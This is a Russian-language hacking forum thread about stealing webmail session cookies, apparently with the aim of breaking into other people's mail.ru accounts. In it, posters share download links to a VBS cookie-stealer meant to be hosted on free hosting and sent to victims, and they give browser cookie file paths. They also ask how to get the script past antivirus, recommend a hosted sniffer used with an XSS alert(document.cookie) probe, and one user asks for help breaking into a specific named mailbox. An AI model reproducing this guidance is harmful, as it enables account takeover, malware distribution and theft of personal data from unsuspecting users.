Кража куки через клик по ссылке
 

если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
ЗЫ: пишем те, кто уже точно знает!

В общем случае куки можно получить только в рамках одного домена.

смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!

не будут

так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!

Ты, видимо, не понимаешь, что куки без xss не своруешь.

та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!

Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS
Как ты без двигателя толкнешь колеса?
Да никак.
Xss и используется, чтобы сookie своровать.

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!

Не исключено, что нет.
Может, не говорят о ней, или еще не нашли?
Если пытаешься атаковать там, где нет Xss все действия просто бессмыслены)

а как можно легко добыть куки почт ящика, не посылайте читать темы, просто опишите как делаете это вы!

http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2

Ice_Burn, скажи еще как именно залить? Narod.ru подойдет? Какую ссылку нужно давать? И куда прийдут куки?

закончи школу, утройся на работу и забудешь про xss...

Буду проверять :) гыыы ну естесно у лоха никаих антивиров не должно быть ?

ТС задолбал создавать тупые темы !!! где модераторы???

http://forum.antichat.ru/thread118782.html
http://forum.antichat.ru/thread118777.html

нельзя же быть настолько тупым.. читай форум и не задавай тупых вопросов.

слушай, я задаю эти вопросы и людя интересно, которые тоже заинтересованы в помоще, а ты такой же новичек как и я, и кричиш тут на весь форум "Где модераторы..." воображая из себя какого то перца!
ЗЫ: кто то тестил способ от Ice_Burn

Не хочу оффтопить, но воображаешь из себя только ты и причем не "какого то перца", а какого-то неадыкватного человека.. зачем создавать 3 одинаковых темы и обсуждать в них вопрос который понятен ЛЮБОМУ кто хоть чуть-чуть шарит в IT... а ты если не шаришь, то попытайся хотя бы полистать форум, начни с этой темы: http://forum.antichat.ru/thread20140.html
з.ы. мой статус новичка ни о чем не говорит...

я читал, ну ты пойми, ну это же почти нериал искать ети xss, вот возьмем mail.ru, при регистрации пару полей и я проверял нет там xss? где еще можно искать? на "Мой мир" такая же история, естих полей мало для заолнения и коментов ГДЕ там чтот о можно найти, БРЕД!

Спс надо затестить

может я и нуб.... но по-моему скрипт просто открывается как текстовый файл.

сори, я все вразумил.

так работает такая схема или нет, отпишитеся!

Залить лучше на Народ
Открываете файл через текстовой редактор и вписываете данные зареганного хоста
Линк давать прямой....http://name.narod.ru/123.vbs

А возможно с Мозиллы украсть куки??? не могу понять как прописать путь к куки, путь вот он C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%") & "\Application Data\Mozilla\Firefox\Profiles\r5a2432u.default\coo kies.sqlite но я так понимаю что r5a2432u.default будет на каждом компе разный. Я прав или нет?

хм... вообще-то ты бред пишешь, при определенных условиях можно угнать куки даже если нет XSS

помогите пожалуста взломать мыло pink23@mail.ru. Уже всё перепробывал и ничего не получается!!!

Прочитал тему , чтото толком не понял , допутсим есть сайт у меня я хочю чтоб у каждого зашедшего тырились куки , напимер от почты и контакт или однокласники , мне для етого нужно как каждом сервисе искать хсс ? или как зедалть чтоб сливались все кучи что есть в папке кукисов у юзера?

Прав
сейчас проверю

ну если сможешь на хост залить вирус который сам качается и запускается, то да. А так куки от контакта хранятся в \Documents and Settings\пользователь\Cookies

не проверю, ссылка не работает. Кто нить перезалейте. я про это

Inviz2009.narod.ru/kuki_2.rar
без пароля

Кто то пробовал уже, тяжело отписать?!

пробовал работает!еще бы туда определение ОС и чтоб с висты тоже тырить.вот только вопрос,к чему етот скрипт прилепить чтоб антивирь не палил??? joiner2.5 и то что он слепил нод сразу удалил

Никому это не интересно,потому что такой кривобред даже я не напишу(

Вокс,дай свою асю в ЛС,спрошу кое-что...

ама

я всё во скрипт вписал!!!!!
но он чтот не пашет:((((

на народ он не заливается!!!:(
www.....xxx.ru/1.vbs он его открывает как обычный текстовый документ!!(((
что делать!?

Да ё моё скачай легче просто снифер нормальный!
Залей на бесплатку!
И всё !
Ссылка на один из мощнейший снифер!
http://depositfiles.com/files/wzuru9epk
Советую ставить на хостинг uuuq
Строгие требования: PHP + MySQL + htaccess

Если помог смело ставь +

долбаёп, хсс нужны, без них никак ;)
вот пример на рамблере :)
alert(document.cookie) - это значит, чтобы мы увидили куки, ну и осталось тока сделать, чтобы они записывалисы в снифер, вот нормальный http://kanick.ru/sniffer/
p.s. удачи в хеке :D и почитай вот это http://forum.antichat.ru/thread20140.html